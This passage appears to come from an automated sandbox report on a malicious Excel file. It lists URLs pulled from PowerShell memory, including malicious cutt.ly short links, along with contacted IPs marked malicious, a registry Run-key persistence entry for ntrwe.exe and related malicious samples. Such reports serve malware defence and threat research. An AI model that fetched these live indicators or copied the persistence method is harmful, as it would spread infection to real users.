                      http://www.certifikat.dk/repository0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.chambersign.org1powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.pkioverheid.nl/policies/root-policy0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://repository.swisssign.com/0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                        high
                        http://crl.ssc.lt/root-c/cacrl.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlpowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://ca.disig.sk/ca/crl/ca_disig.crl0powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.certplus.com/CRL/class3P.crl0powershell.exe, 00000006.00000003.2094933870.000000001D1B9000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://repository.infonotary.com/cps/qcps.html0$powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.post.trust.ie/reposit/cps.html0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp, powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.certplus.com/CRL/class2.crl0powershell.exe, 00000006.00000003.2094933870.000000001D1B9000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.disig.sk/ca/crl/ca_disig.crl0powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://ocsp.infonotary.com/responder.cgi0Vpowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.sk.ee/cps/0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.globaltrust.info0=powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0Epowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://servername/isapibackend.dllpowershell.exe, 00000006.00000002.2107223409.000000001D360000.00000002.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://www.ssc.lt/cps03powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.windows.com/pctv.12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpfalse
                          high
                          http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://ocsp.pki.gva.es0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://crl.oces.certifikat.dk/oces.crl0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://crl.ssc.lt/root-b/cacrl.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.certicamara.com/dpc/0Zpowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                            high
                            http://crl.pki.wellsfargo.com/wsprca.crl0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                              high
                              http://www.dnie.es/dpc0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.rootca.or.kr/rca/cps.html0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.trustcenter.de/guidelines0powershell.exe, 00000006.00000003.2094858856.000000001D2AE000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://windowsmedia.com/redir/services.asp?WMPFriendly=truepowershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.globaltrust.info0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://certificates.starfieldtech.com/repository/1604powershell.exe, 00000006.00000002.2105871443.000000001D196000.00000004.00000001.sdmpfalse
                                high
                                http://www.certplus.com/CRL/class3TS.crl0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.entrust.net/CRL/Client1.crl0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.entrust.net/CRL/net1.crl0powershell.exe, 00000006.00000003.2094933870.000000001D1B9000.00000004.00000001.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000006.00000002.2098764453.0000000002330000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2135210182.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2149819469.0000000002360000.00000002.00000001.sdmpfalse
                                      high
                                      https://www.catcert.net/verarrelpowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.disig.sk/ca0fpowershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp, powershell.exe, 00000008.00000002.2134654234.000000000024E000.00000004.00000020.sdmpfalse
                                        high
                                        http://www.e-szigno.hu/RootCA.crlpowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.signatur.rtr.at/current.crl0powershell.exe, 00000006.00000003.2094900131.000000001D1E4000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.sk.ee/juur/crl/0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://crl.chambersign.org/chambersignroot.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://crl.xrampsecurity.com/XGCA.crl0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.quovadis.bm0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://crl.ssc.lt/root-a/cacrl.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.trustdst.com/certificates/policy/ACES-index.html0powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.firmaprofesional.com0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://cutt.ly/powershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.netlock.net/docspowershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crlpowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://crl.entrust.net/2048ca.crl0powershell.exe, 00000006.00000002.2103729703.000000001B8CC000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0powershell.exe, 00000006.00000002.2105871443.000000001D196000.00000004.00000001.sdmpfalse
                                                high
                                                http://cps.chambersign.org/cps/publicnotaryroot.html0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.e-trust.be/CPS/QNcertspowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.certicamara.com/certicamaraca.crl0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.msnbc.com/news/ticker.txtpowershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://fedir.comsign.co.il/crl/ComSignCA.crl0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://ocsp.entrust.net03powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.ibsensoftware.com/RegAsm.exefalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://cps.chambersign.org/cps/chambersroot.html0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.acabogacia.org0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://cutt.lypowershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://ca.sia.it/seccli/repository/CPS0powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://crl.securetrust.com/SGCA.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://crl.securetrust.com/STCA.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://cutt.ly/qjdJoz4PEpowershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.icra.org/vocabulary/.powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.certicamara.com/certicamaraca.crl0;powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.e-szigno.hu/RootCA.crt0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.quovadisglobal.com/cps0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0Lpowershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://investor.msn.com/powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.valicert.com/1powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.e-szigno.hu/SZSZ/0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://www.%s.comPApowershell.exe, 00000006.00000002.2098764453.0000000002330000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2135210182.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2149819469.0000000002360000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                low
                                                                http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://ocsp.quovadisoffshore.com0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://ocsp.entrust.net0Dpowershell.exe, 00000006.00000002.2103729703.000000001B8CC000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://cps.chambersign.org/cps/chambersignroot.html0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://cutt.ly/qjdJoz4powershell.exe, 00000006.00000002.2098023844.00000000001D0000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2099196904.0000000002BD1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2099216608.0000000002BFF000.00000004.00000001.sdmptrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://ca.sia.it/secsrv/repository/CRL.der0Jpowershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown

                                                                Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                83.172.144.37
                                                                unknownNetherlands
                                                                25459NEDZONE-ASNLtrue
                                                                104.22.0.232
                                                                unknownUnited States
                                                                13335CLOUDFLARENETUStrue
                                                                185.206.215.56
                                                                unknownUkraine
                                                                204601ON-LINE-DATAServerlocation-NetherlandsDrontenNLtrue

                                                                General Information

                                                                Joe Sandbox Version:31.0.0 Red Diamond
                                                                Analysis ID:336301
                                                                Start date:05.01.2021
                                                                Start time:19:04:25
                                                                Joe Sandbox Product:CloudBasic
                                                                Overall analysis duration:0h 10m 12s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Sample file name:6Cprm97UTl (renamed file extension from none to xls)
                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                Number of analysed new started processes analysed:21
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • HDC enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Detection:MAL
                                                                Classification:mal100.spyw.expl.evad.winXLS@27/18@2/3
                                                                EGA Information:
                                                                • Successful, ratio: 71.4%
                                                                HDC Information:
                                                                • Successful, ratio: 31.4% (good quality ratio 30.5%)
                                                                • Quality average: 78.2%
                                                                • Quality standard deviation: 27.4%
                                                                HCA Information:
                                                                • Successful, ratio: 99%
                                                                • Number of executed functions: 120
                                                                • Number of non-executed functions: 4
                                                                Cookbook Comments:
                                                                • Adjust boot time
                                                                • Enable AMSI
                                                                • Changed system and user locale, location and keyboard layout to English - United States
                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                • Attach to Office via COM
                                                                • Scroll down
                                                                • Close Viewer
                                                                Warnings:
                                                                Show All
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 2.20.142.210, 2.20.142.209
                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net
                                                                • Execution Graph export aborted for target RegAsm.exe, PID 2844 because there are no executed function
                                                                • Execution Graph export aborted for target powershell.exe, PID 1324 because it is empty
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/336301/sample/6Cprm97UTl.xls

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                19:04:41API Interceptor449x Sleep call for process: powershell.exe modified
                                                                19:05:09API Interceptor122x Sleep call for process: 12.exe modified
                                                                19:05:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run jfdts C:\Users\user\ntrwe.exe
                                                                19:05:22API Interceptor98x Sleep call for process: ntrwe.exe modified
                                                                19:05:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run jfdts C:\Users\user\ntrwe.exe
                                                                19:05:29API Interceptor779x Sleep call for process: RegAsm.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                104.22.0.232sample products trade reference.docxGet hashmaliciousBrowse
                                                                • cutt.ly/
                                                                Request_for_Quotation.xlsmGet hashmaliciousBrowse
                                                                • cutt.ly/gdvAeui

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                cutt.lyspetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                AdviceSlip.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                file.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                file.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                file.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                output.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                SecuriteInfo.com.Heur.20246.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                SecuriteInfo.com.Exploit.Siggen3.5270.27062.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                SecuriteInfo.com.Exploit.Siggen3.5270.27062.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                30689741.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                95773220855.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                95773220855.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                MT-000137.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                95773220855.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                MT-000137.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232

                                                                ASN

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                NEDZONE-ASNLhttps://balenpersen.com/TO/financialcrimes@lvmpd.comGet hashmaliciousBrowse
                                                                • 83.172.131.9
                                                                SecuriteInfo.com.Trojan.GenericKD.34438057.21356.docGet hashmaliciousBrowse
                                                                • 83.172.180.164
                                                                https://installatiebedrijfroosendaal.nl/ONWFP-gO_YnJ-5Yu/ACH/PaymentAdvice/En_us/Sales-InvoiceGet hashmaliciousBrowse
                                                                • 83.172.144.29
                                                                CLOUDFLARENETUSAudio_47720.wavv - - Copy.htmGet hashmaliciousBrowse
                                                                • 104.16.19.94
                                                                Adjunto.docGet hashmaliciousBrowse
                                                                • 104.27.144.251
                                                                details.htmlGet hashmaliciousBrowse
                                                                • 104.16.126.175
                                                                https://notification1.bubbleapps.io/version-test?debug_mode=trueGet hashmaliciousBrowse
                                                                • 104.19.241.93
                                                                NQN0244_012021.docGet hashmaliciousBrowse
                                                                • 104.27.144.251
                                                                sek750_2021.exeGet hashmaliciousBrowse
                                                                • 172.67.166.210
                                                                4560 2021 UE_9893.docGet hashmaliciousBrowse
                                                                • 104.18.61.59
                                                                Stremio+4.4.120.exeGet hashmaliciousBrowse
                                                                • 104.16.135.12
                                                                https://bitly.com/2XaL0DpGet hashmaliciousBrowse
                                                                • 104.27.183.152
                                                                lJV2MfkPFd.exeGet hashmaliciousBrowse
                                                                • 104.27.151.210
                                                                DAT 2020_12_30.docGet hashmaliciousBrowse
                                                                • 172.67.191.146
                                                                https://f000.backblazeb2.com/file/url-data-web-storage-secured-56adbcsjhdcbjs/web-data-server-1uyhchduiahc/index.htmlGet hashmaliciousBrowse
                                                                • 104.18.55.96
                                                                G6slMyq847.exeGet hashmaliciousBrowse
                                                                • 104.27.151.210
                                                                https://f000.backblazeb2.com/file/url-data-web-storage-secured-56adbcsjhdcbjs/web-data-server-1uyhchduiahc/index.htmlGet hashmaliciousBrowse
                                                                • 104.16.18.94
                                                                Scan-0767672.docGet hashmaliciousBrowse
                                                                • 104.27.144.251
                                                                http://quickneasyrecipes.coGet hashmaliciousBrowse
                                                                • 104.18.226.52
                                                                Documento-2021.docGet hashmaliciousBrowse
                                                                • 172.67.141.14
                                                                #Ud83d#Udcdejsi12615.htmlGet hashmaliciousBrowse
                                                                • 104.16.18.94
                                                                https://splendideventsllc.org/Banco/Get hashmaliciousBrowse
                                                                • 104.18.82.87
                                                                https://splendideventsllc.org/Banco/Get hashmaliciousBrowse
                                                                • 104.18.207.19
                                                                ON-LINE-DATAServerlocation-NetherlandsDrontenNLhttp://d4a687ce4c.lazeruka.ruGet hashmaliciousBrowse
                                                                • 91.211.251.72
                                                                New order.docGet hashmaliciousBrowse
                                                                • 92.119.113.115
                                                                Purchase order.docGet hashmaliciousBrowse
                                                                • 92.119.113.115
                                                                PO20-AE12-0023.docGet hashmaliciousBrowse
                                                                • 92.119.113.140
                                                                ES-MA-18-9 4130.docGet hashmaliciousBrowse
                                                                • 92.119.113.140
                                                                Order-list.docGet hashmaliciousBrowse
                                                                • 92.119.113.140
                                                                Launcher.exeGet hashmaliciousBrowse
                                                                • 185.92.148.230
                                                                UXsGbxVc2I.rtfGet hashmaliciousBrowse
                                                                • 92.119.113.115
                                                                Documents.docGet hashmaliciousBrowse
                                                                • 92.119.113.115
                                                                http://clcktut.work/public/8852102841203823Get hashmaliciousBrowse
                                                                • 45.82.69.137
                                                                Vlpuoe2JSz.exeGet hashmaliciousBrowse
                                                                • 45.147.197.185
                                                                PI.xlsxGet hashmaliciousBrowse
                                                                • 45.147.197.185
                                                                PO#181120_pdf.exeGet hashmaliciousBrowse
                                                                • 92.119.113.115
                                                                http://sh1563741.a.had.su/Area-Cliente/informazioni/web/Get hashmaliciousBrowse
                                                                • 45.147.197.180
                                                                u4WV77ddWF.dllGet hashmaliciousBrowse
                                                                • 185.219.83.48
                                                                k1mh5904.exeGet hashmaliciousBrowse
                                                                • 95.215.206.139
                                                                VVV.exeGet hashmaliciousBrowse
                                                                • 178.159.43.35
                                                                Internet download manager cracker (1).exeGet hashmaliciousBrowse
                                                                • 45.147.197.110
                                                                http://www.google.com/url?q=http%3A%2F%2Fjonfriskics.com%2Flotterye&sa=D&sntz=1&usg=AFQjCNFU254PyrxnCIpYtaqc4jMuBkMlpgGet hashmaliciousBrowse
                                                                • 45.147.197.36
                                                                http://prevuse.ruGet hashmaliciousBrowse
                                                                • 45.147.197.20

                                                                JA3 Fingerprints

